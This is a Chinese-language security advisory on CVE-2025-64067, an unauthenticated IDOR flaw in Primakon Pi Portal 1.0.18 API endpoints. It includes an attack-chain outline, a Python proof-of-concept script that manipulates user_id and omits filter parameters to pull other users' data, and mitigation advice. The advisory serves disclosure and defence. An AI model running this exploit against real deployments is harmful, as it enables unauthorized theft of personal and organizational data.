IPBUF安全漏洞报告
English
CVE-2025-64067 CVSS 5.3 中危

CVE-2025-64067 Primakon Pi Portal 1.0.18 IDOR漏洞

披露日期: 2025-11-25
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-64067
漏洞类型
不安全的直接对象引用(IDOR)
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Primakon Pi Portal 1.0.18

相关标签

IDOR不安全的直接对象引用API安全访问控制Primakon Pi Portal数据泄露未授权访问CVE-2025-64067

漏洞概述

CVE-2025-64067是Primakon Pi Portal 1.0.18版本中的一个中危安全漏洞,CVSS评分5.3。该漏洞存在于API端点中,负责检索对象特定数据或过滤数据的功能(如用户配置文件、项目记录等)未能实现足够的服务器端验证机制。攻击者可利用此漏洞在无需认证的情况下,通过操纵ID参数或省略过滤参数来非法访问其他用户的敏感个人和机构信息。此漏洞可能导致大规模数据泄露,包括用户个人资料、项目数据和其他机密业务信息,对组织的数据安全构成严重威胁。

技术细节

该IDOR漏洞主要影响Primakon Pi Portal的API端点,这些端点负责处理对象特定数据检索请求。漏洞存在两种主要利用方式:

1. 直接ID操纵(Direct ID Manipulation):API端点接受ID参数(如user_id、project_id)来定位和返回特定资源。攻击者可以通过修改这些ID参数的值,在未授权的情况下访问属于其他用户或项目的敏感数据。例如,将当前用户的user_id更改为目标用户的ID,即可获取该用户的个人信息和项目数据。

2. 过滤参数省略(Filter Omission):部分API端点支持通过过滤参数来限制返回数据的范围。攻击者可以通过完全省略这些过滤参数,诱导系统返回所有存储记录的完整未过滤数据集,从而一次性获取所有用户的信息。

根本原因是API缺少对象级别的访问控制检查,未能验证当前请求用户是否有权访问所请求的特定对象或数据集。服务器端仅检查用户是否已认证,但未验证用户与目标对象之间的所有权或权限关系。

攻击链分析

STEP 1
步骤1
信息收集:攻击者首先识别目标系统为Primakon Pi Portal 1.0.18,并定位其API端点结构
STEP 2
步骤2
端点探测:攻击者访问API端点(如/api/user/profile、/api/projects/list),观察响应格式和参数结构
STEP 3
步骤3
ID操纵利用:攻击者通过修改请求中的user_id或project_id参数,尝试访问其他用户的数据
STEP 4
步骤4
过滤省略利用:攻击者尝试省略过滤参数,触发系统返回完整的未过滤数据集
STEP 5
步骤5
数据窃取:成功利用后,攻击者批量获取敏感用户信息、项目数据和其他机密业务数据
STEP 6
步骤6
数据利用:攻击者将窃取的数据用于进一步攻击、社会工程或其他恶意目的

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # CVE-2025-64067 PoC - IDOR in Primakon Pi Portal 1.0.18 # Target: Primakon Pi Portal API endpoints # Vulnerability: Insecure Direct Object Reference (IDOR) TARGET_URL = "http://target-server.com/api" VULN_ENDPOINT = "/api/user/profile" # PoC 1: Direct ID Manipulation def exploit_direct_id_manipulation(): """ Exploit by changing user_id parameter to access other users' data """ print("[*] Testing Direct ID Manipulation...") # Original request (legitimate user with ID 1) original_payload = {"user_id": 1} # Attacker changes user_id to target user (e.g., ID 100) manipulated_payload = {"user_id": 100} headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } # Send request with manipulated ID response = requests.get( f"{TARGET_URL}{VULN_ENDPOINT}", params=manipulated_payload, headers=headers, timeout=10 ) if response.status_code == 200: print("[+] Successfully accessed user data via ID manipulation") print(f"[+] Response: {response.text}") return response.json() else: print(f"[-] Request failed with status: {response.status_code}") return None # PoC 2: Filter Omission Attack def exploit_filter_omission(): """ Exploit by omitting filter parameters to retrieve all records """ print("[*] Testing Filter Omission Attack...") headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } # Request without any filter parameter response = requests.get( f"{TARGET_URL}/api/projects/list", headers=headers, timeout=10 ) if response.status_code == 200: data = response.json() if isinstance(data, list) and len(data) > 1: print(f"[+] Successfully retrieved unfiltered dataset") print(f"[+] Total records: {len(data)}") print(f"[+] Sample data: {json.dumps(data[:2], indent=2)}") return data else: print("[-] Unexpected response format") return None else: print(f"[-] Request failed with status: {response.status_code}") return None if __name__ == "__main__": print("=" * 60) print("CVE-2025-64067 PoC - Primakon Pi Portal IDOR") print("=" * 60) # Test both exploitation techniques exploit_direct_id_manipulation() print() exploit_filter_omission()

影响范围

Primakon Pi Portal 1.0.18

防御指南

临时缓解措施
在厂商发布正式修复补丁之前,建议采取以下临时缓解措施:1)限制API端点的网络访问,仅允许受信任的IP地址访问;2)实施请求速率限制(Rate Limiting)防止批量数据窃取;3)启用Web应用防火墙(WAF)规则检测异常的ID参数修改行为;4)加强对API访问日志的实时监控,设置敏感数据访问的告警机制;5)评估是否需要暂时禁用受影响的API功能以避免数据泄露风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表